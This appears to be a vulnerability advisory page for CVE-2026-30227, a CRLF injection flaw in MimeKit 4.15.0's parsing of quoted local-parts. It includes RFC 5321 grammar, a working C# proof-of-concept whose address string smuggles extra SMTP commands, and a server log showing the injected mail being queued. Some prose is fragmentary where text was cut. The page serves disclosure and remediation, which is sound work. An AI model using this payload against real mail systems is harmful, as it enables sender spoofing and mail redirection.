CVE-2026-30227 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Lower probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
A CRLF Injection vulnerability in MimeKit 4.15.0 allows an attacker to embed \r\n into the SMTP envelope address local-part (when the local-part is a quoted-string). This is non-compliant with RFC 5321 and can result in SMTP command injection (e.g., injecting additional RCPT TO / DATA / RSET commands) and/or mail header injection, depending on how the application uses MailKit/MimeKit to construct and send messages. The issue becomes exploitable when the attacker can influence a MailboxAddress (MAIL FROM / RCPT TO) value that is later serialized to an SMTP session.
RFC 5321 explicitly defines the SMTP mailbox local-part grammar and does not permit CR (13) or LF (10) inside Quoted-string (qtextSMTP and quoted-pairSMTP ranges exclude control characters). SMTP commands are terminated by <CRLF>, making CRLF injection in command arguments particularly dangerous.
RFC 5321 defines:
mail = "MAIL FROM:" Reverse-path [SP Mail-parameters] CRLF
Reverse-path = Path / "<>"
Path = "<" [ A-d-l ":" ] Mailbox ">"
A-d-l = At-domain *( "," At-domain )
At-domain = "@" Domain
Mailbox = Local-part "@" ( Domain / address-literal )
Local-part = Dot-string / Quoted-string
Dot-string = Atom *("." Atom)
Atom = 1*atext
atext = ALPHA / DIGIT /
"!" / "#" / "$" / "%" / "&" / "'" / "*" / "+" / "-" / "/" /
"=" / "?" / "^" / "_" / "`" / "{" / "|" / "}" / "~"
Quoted-string = DQUOTE *QcontentSMTP DQUOTE
QcontentSMTP = qtextSMTP / quoted-pairSMTP
quoted-pairSMTP = %d92 %d32-126
qtextSMTP = %d32-33 / %d35-91 / %d93-126
When the local part is a quoted string, the characters <CR> and <LF> are not allowed.
In the MimeKit 4.15.0 version, when parsing the local part, the <CR> and <LF> characters in the double-quoted form will not be detected.
As a result, MailboxAddress can accept addresses like "attacker\r\nRCPT TO:<victim@target>\r\n"@example.com as a valid address.
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.
MailboxAddress from that input, andEnvironment:
mimekit_poc.csproj
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net8.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
</PropertyGroup>
<ItemGroup>
<PackageReference Include="MailKit" Version="4.15.0" />
</ItemGroup>
</Project>
using MailKit.Net.Smtp;
using MailKit.Security;
using MailKit;
using MimeKit;
// === payload and target setting ===
var smtpHost = "xx.xx.xx.xx";
var smtpPort = 25;
var useTls = false;
// attack in `MAIL FROM` cmd with address grammar in double quote
var payloadEvilMailFromInput = "\"attack\r\nRSET\r\nMAIL FROM:<[email protected]>\r\nRCPT TO:<[email protected]>\r\nDATA\r\n.\r\nQUIT\r\nhere\"@poc.send.com";
// log in log/smtp_log_{yyyyMMdd_HHmmss_fff}.txt
var logDir = Path.Combine(AppContext.BaseDirectory, "log");
Directory.CreateDirectory(logDir);
var timestamp = DateTime.Now.ToString("yyyyMMdd_HHmmss_fff");
var logPath = Path.Combine(logDir, $"smtp_log_{timestamp}");
// === below smtp session ===
// mimekit api
var envelopeFrom = new MailboxAddress("", payloadEvilMailFromInput);
var envelopeRcpt = new MailboxAddress("", "\"kc1zs4\"@poc.recv.com");
var headerFrom = new MailboxAddress("Sender", "[email protected]");
var headerTo = new MailboxAddress("Recipient", "[email protected]");
var message = new MimeMessage();
message.From.Add(headerFrom);
message.To.Add(headerTo);
message.Subject = "mimekit CRLF injection poc";
message.Body = new TextPart("plain") { Text = "Hello from MimeKit 4.15.0" };
try {
using var protocolLogger = new ProtocolLogger(logPath);
using var client = new SmtpClient(protocolLogger);
var socketOption = useTls ? SecureSocketOptions.StartTls : SecureSocketOptions.None;
client.Connect(smtpHost, smtpPort, socketOption);
client.Send(FormatOptions.Default, message, envelopeFrom, new[] { envelopeRcpt });
client.Disconnect(true);
Console.WriteLine("[+] successfully send mail");
Console.WriteLine($"[+] view smtp session log at: {logPath}");
} catch (SmtpCommandException ex) {
Console.Error.WriteLine($"[!] smtp cmd err: {ex.StatusCode} - {ex.Message}");
Console.Error.WriteLine($"[!] view smtp session log at: {logPath}");
Environment.ExitCode = 1;
} catch (SmtpProtocolException ex) {
Console.Error.WriteLine($"[!] smtp protocol err: {ex.Message}");
Console.Error.WriteLine($"[!] view smtp session log at: {logPath}");
Environment.ExitCode = 1;
} catch (Exception ex) {
Console.Error.WriteLine($"[!] unknown err: {ex.Message}");
Console.Error.WriteLine($"[!] view smtp session log at: {logPath}");
Environment.ExitCode = 1;
}
MailboxAddress accepts the injected addr-spec containing CRLF inside the quoted local-part because it relies on quoted-string skipping that does not reject CR/LF.MAIL FROM line being split by the injected CRLF, followed by attacker-controlled SMTP commands.tcpdump also shows the same raw SMTP stream (optional confirmation).Example (illustrative) excerpt from smtp session log showing the CRLF injection effect:
Connected to smtp://xxx.xxx.xxx.xxx:25/
S: 220 xxx Axigen ESMTP ready
C: EHLO KC1zs4-TPt14p
S: 250-xxx Axigen ESMTP hello
S: 250-PIPELINING
S: 250-AUTH PLAIN LOGIN CRAM-MD5 DIGEST-MD5 GSSAPI
S: 250-AUTH=PLAIN LOGIN CRAM-MD5 DIGEST-MD5 GSSAPI
S: 250-8BITMIME
S: 250-SIZE 10485760
S: 250-HELP
S: 250 OK
C: MAIL FROM:<"attack
C: RSET
C: MAIL FROM:<[email protected]>
C: RCPT TO:<[email protected]>
C: DATA
C: .
C: QUIT
C: here"@poc.send.com> SIZE=293
C: RCPT TO:<"kc1zs4"@poc.recv.com>
S: 553 Invalid mail address
S: 250 Reset done
S: 250 Sender accepted
S: 250 Recipient accepted
S: 354 Ready to receive data; remember <CRLF>.<CRLF>
S: 250 Mail queued for delivery
S: 221-xxx Axigen ESMTP is closing connection
S: 221 Good bye
C: RSET
Notes:
MailboxAddress) is sufficient to demonstrate the vulnerability class and protocol non-compliance.<CRLF>, so CRLF-in-argument is structurally hazardous by design.Vulnerability class:
Who is impacted:
Potential consequences:
RCPT TO commands (mail redirection / data exfiltration).RSET, NOOP, etc.) or attempt early DATA injection (server-dependent).Suggested remediation (high level):
\r and \n in local-part (and ideally anywhere) when parsing/constructing mailbox addresses used for SMTP envelopes.qtextSMTP and quoted-pairSMTP ranges (no control characters).